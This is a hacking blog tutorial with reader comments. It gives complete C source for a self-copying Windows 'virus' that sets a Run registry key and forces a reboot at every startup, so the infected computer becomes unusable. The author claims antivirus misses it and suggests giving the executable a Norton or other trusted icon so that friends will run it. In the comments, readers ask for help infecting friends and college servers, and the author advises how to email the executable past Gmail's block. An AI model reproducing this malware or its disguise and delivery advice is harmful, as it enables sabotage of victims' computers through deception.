A Virus Program to Restart the Computer at Every Startup

C PROGRAMMING, VIRUS CREATION

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Tags:
← How to Create a Virus to Block Websites File Embedder Project in C →

About the author

Srikanth

Srikanth Ramesh is a computer engineer from Bengaluru, India. He is the founder of Go Hacking, an IT security blog. You can learn more about him here and get in touch with him on Google+ and Twitter.

99 Comments

  1. Jiyar
     January 17, 2009 at 1:48 AM

    hii Srikanth can i just download the virus and use it???
    if Yes Give Me a link plz i cant’ use rapidshare.com or send it to my email

  2. Nilesh
     January 25, 2009 at 12:29 PM

    Cool site dude :-) :-) how to create a virus that run automatically without d execution

  3. av
     January 26, 2009 at 5:58 AM

    @nilesh
    This is an advance mode of programming. You must first knew how to code on assembly language programming (low level programming). Then, the vulnerability of a certain Operating system or a targeted running program which can connect to network (such as lsass.exe). These are also called exploits, a techniques used by most viruses to spread quickly.

    i recommend the following link:
    http://www.governmentsecurity.org/articles/IntroductiontoBufferOverflow.php

  4. Joel
     January 27, 2009 at 10:25 PM

    yeah i cant get the source and when i use my normal dev c++ i get problems visual studio doesn’t work either. Plus rapidshare is just screwed up for me. Would it be too much trouble for me to ask you to zip both the source and the .exe and post it on mediafire?

  5. Nilesh
     January 28, 2009 at 3:41 PM

    @av
    hey thanks……

  6. Monik
     February 6, 2009 at 7:19 PM

    Hey, cool program man, i have just started learning hacking, but i understant your programs quiet well. I have thrashed many computers throught this exploits and then i only repaired them and gained the fame in my college. thanks sri for providing such information. i’ll be going through all your all your articles turn by turn. coz, now my ultimate aim is to become hacker. thanks again.

  7. ricky
     February 13, 2009 at 3:09 PM

    the .exefile doesn’t work…..system doesnot restart.
    there was no file named sres in the registry plz help

  8. Rajiv
     February 14, 2009 at 5:26 PM

    Can you teach us to make mobile virus using notepad??? I have got 4 mobile virus codes made in notepad- Cabir and Skulls…. Can you help us make more???? Like Curse of Silence??? And is Black Wolf a dreadly virus??? I have just heard its name…

  9. zeroday
     February 15, 2009 at 3:02 AM

    i dont know why u always keep on finding the root dir which can e done thru GetSystemDirectory() function

  10. nik
     February 17, 2009 at 12:37 PM

    hi can u pls help me 2 put som virus into our coll servers

  11. sid
     February 20, 2009 at 5:49 PM

    u have some cool ideas.make some more bright ideas to share with us

  12. Daniel Tatsuki
     February 24, 2009 at 8:30 PM

    Love this site. I can’t wait to infect a friends comp with this. Hehehe.

  13. Karthik
     March 3, 2009 at 6:51 PM

    Hi…….I’ve been having a problem with my comp……..the THB virus has affected it ‘n I’m not able to remove it with my norton which was updated only 3 weeks ago(I’m not able to do so now ‘coz I’m unable to renew it)……..the problem here is my system seems to be linked to the antivirus…..if i delete it to install sumthing like caspersky or avg my system crashes…..I’m at my wits end!!!!….I really need da comp now ‘n I’m not able to use it properly!………..plz help!!!!!

  14. Srikanth
     March 5, 2009 at 2:33 PM

    @ Karthik

    Try the following.

    in your c: drive first enable show hidden file in folder option after that in c drive you can see two hidden files 1. .icon (with the same
    picture that you see as drive icon)and 2. autorun.inf delete both and restart system……..

    If the above method doesn’t work I recommend you to format and re-install your OS.

  15. Anmaya
     March 13, 2009 at 4:02 PM

    Hi! My Pc is infected by a virus that logs off my computer at every time i start my computer.If i try to login again.It immedeately logs off again.PLZ HELP.

  16. Srikanth
     March 13, 2009 at 9:26 PM

    @ Anmaya

    Reboot your PC in the safe mode. To reboot in Safe mode press F8 as soon as your System boot is started. in the safe more goto run and type the folloring in run box

    msconfig ans press enter

    In the System configuration Window open the Startup tab. There you’ll see the entry for the virus that is causing the restart. Uncheck the tick mark against it. Reboot your system normally. Everything should be OK from now on…

  17. john
     March 21, 2009 at 12:10 PM

    Dear Srikanth (author),

    Have a wonderful day !

    i wanted to send this virus to my friend just for fun , but i was unable to send , it says that it is an executable files and you cannot send this type of files for gmail security reasons. PLEASE HELP here!!!

    John

  18. Srikanth
     March 21, 2009 at 7:37 PM

    @ john

    Send it using Yahoo OR upload it to rapidshare and ask your friend to download it by sending the download link via email.

  19. Dhiraj Singh
     March 23, 2009 at 8:27 PM

    Now That is Something Real Stuff……

    Really a very good site for people who want to do something different with ” C “. Really Boss heads off to you.

    Tell me one thing can we upload our codes on your site….so that the knowledge can be shared….only if you allow.

    This is my idea…you keep on rocking man….Gud Luck

  20. Dhiraj Singh
     March 23, 2009 at 9:50 PM

    Hi Bro…..

    Can We do multithreading with “turboc”.

    or any other method of running two diff process simultaneously with a 16bit C program.

  21. Srikanth
     March 24, 2009 at 1:12 PM

    @ Dhiraj Singh

    You can share codes but it requires prior approval.

  22. Dhiraj Singh
     March 24, 2009 at 5:43 PM

    Bro Wat about Multithreading…..

    and one more thing that how to edit registry as you have done…in above code. Can you share some more knowledge on this ….. or any other link which can be useful. Plz Reply soon i m eagerly waiting.

    Thanks Bro for sharing your valueable knowledge….really a great job.

  23. Dhiraj Singh
     March 24, 2009 at 7:40 PM

    Sir,

    The Above Code is not working in Turbo c editor.
    System Command is having no effect…no registry Tweak is Happening. What is the Reason and wat is the solution.

  24. Srikanth
     March 25, 2009 at 8:18 PM

    @ Dhiraj Singh

    Trubo C doesn’t suport multithreading.. Dev C++ will support it..

  25. Shashank
     March 30, 2009 at 10:34 AM

    Shrikant, u r simply genius…

  26. MithunRulz
     April 8, 2009 at 10:37 AM

    Heya!!!!

    Well In Ma College Downloading Is Blocked And Aceesing Orkut Is Even Blocked!!

    Can U Tell Me Some Wayz To Bypass The Server And Den Download Or Acess Orkut??

    Thnx Man And Ur Site Rulz

  27. MithunRulz
     April 8, 2009 at 10:39 AM

    And About Antiviruses I Think Also Dat Avira Antivir Is Also Cool….Wat Do U Think??

  28. Hrithik
     April 9, 2009 at 7:33 PM

    what is the process of the restart virus..can you help me?

  29. Raj Singh
     April 13, 2009 at 1:00 AM

    above code is not working properly
    with turbo c++4.5 ver.
    pls help me out to the solve the problem

  30. darkterror
     April 23, 2009 at 6:28 AM

    sir srikanth
    can i rename the sres and sysres.exe here:
    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”);

  31. Srikanth
     April 23, 2009 at 12:02 PM

    @ darkterror

    No don’t do that.. If you really wanna do it, then rename all the instances of sysres in the source code.

  32. darkterror
     April 23, 2009 at 2:04 PM

    ok sir tnx for your advice..

  33. pinkey kaur
     April 23, 2009 at 9:52 PM

    sir how to compiler virus

  34. Aashee
     April 26, 2009 at 2:52 PM

    hello srikanth,
    i m a student of software engg….
    yesterday my instructor has given me an assignment topic i.e., to write code for virus and antivirus in C/C++…… i dont understand wat should i do???
    can you give ur any simple and easy virus and its antivirus code??? only for study purpose… kindly help me….. i hv searched alot but i couldnt understand these viruses code… these are very much difficult…
    kindly help me plz……..
    my email id is
    [email protected]
    thank u sir……..
    w8 4 ur reply
    aashee…………

  35. Rafi
     May 2, 2009 at 2:20 PM

    Hi Mr. Srikanth
    I’m Rafi.
    sir, i’m having problem with the sorce code at :
    exit(0); at line 62

    case 1:
    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”); at line 74

    exit(0); at line 100.

    i received “Call to undefined function”.
    can you tell me what’s wrong with my complier. i used Borlan C++ 5.5.

    Thanks

  36. vilkesh patel
     May 4, 2009 at 10:21 AM

    hello srikant
    this is good it will restart my computer in every boot
    but i can able to break your virus by just typing down
    shutdown -a on dos command prompt so user that i send
    this .exe file have a little knowledge about dos this
    virus does not work

    by the way i appreciate your work
    keep it up

  37. tar
     May 5, 2009 at 8:14 PM

    sir how would i recogonize this virus in system as name of the virus could be anything (name sysres not necessary)

  38. Srikanth
     May 6, 2009 at 11:20 AM

    @ tar

    Goto Start->Run and type msconfig and hit ENTER. Now goto the startup tab and look for suspected programs that run upon Startup. Even the sysres virus(or any name) will have an entry over there. Disable the entry and the virus will stop functioning.

  39. Srikanth
     May 6, 2009 at 11:41 AM

    @ Rafi

    Please make sure that the “process.h” header file is included..

  40. kostas
     May 28, 2009 at 7:01 PM

    I need some advice…I’m new in programming,i know to create some viruses and softwares in notepad…But, i don’t know a damn thing about programming in v.basic, c#, c++….what should i do from the beggining (first thing) to be
    able to start programming…

  41. alex
     June 3, 2009 at 10:07 PM

    I read all the codes but didn’t understand where to type them.will u please teach me?

  42. Srikanth
     June 5, 2009 at 3:41 PM

    @ alex

    You need to learn C language first…

  43. Bun Leap
     June 10, 2009 at 11:03 AM

    Dear sir!
    My computer has virus fun.exe and dc.exe

  44. prank-sters.........
     June 14, 2009 at 2:03 AM

    got sick!!
    or you are a mad person????

  45. prank-sters.........
     June 14, 2009 at 2:05 AM

    i was just jokeing yaar.
    you are grrreeeaaat!

  46. prank-sters.........
     June 14, 2009 at 2:08 AM

    don’t you have more virus?
    i jut wanna attak my friend’s pc.

  47. salman
     June 23, 2009 at 4:56 AM

    Great work sriknth. Pleas tell me how to hack a computer using by WLAN and how to brak or spy DSL password…………

  48. kid
     July 3, 2009 at 9:17 PM

    i tried to change the icon of .exe file created by turbo c ver 3.0 but it failed

    plz hlp me how to create .exe file using turbo c
    how to autorun it.
    change its icon.

  49. madhu
     July 6, 2009 at 11:49 AM

    hai..dear brilliant guy..can u send me the c++ code for a virus which will erase all drives in the computer..pls….i mean datas in the drives..please……….[email protected] this is my id!!

Copyright © 2008-2012 GoHacking.Com. This content is copyrighted to Srikanth and may not be reproduced on other websites.
↑ Scroll to top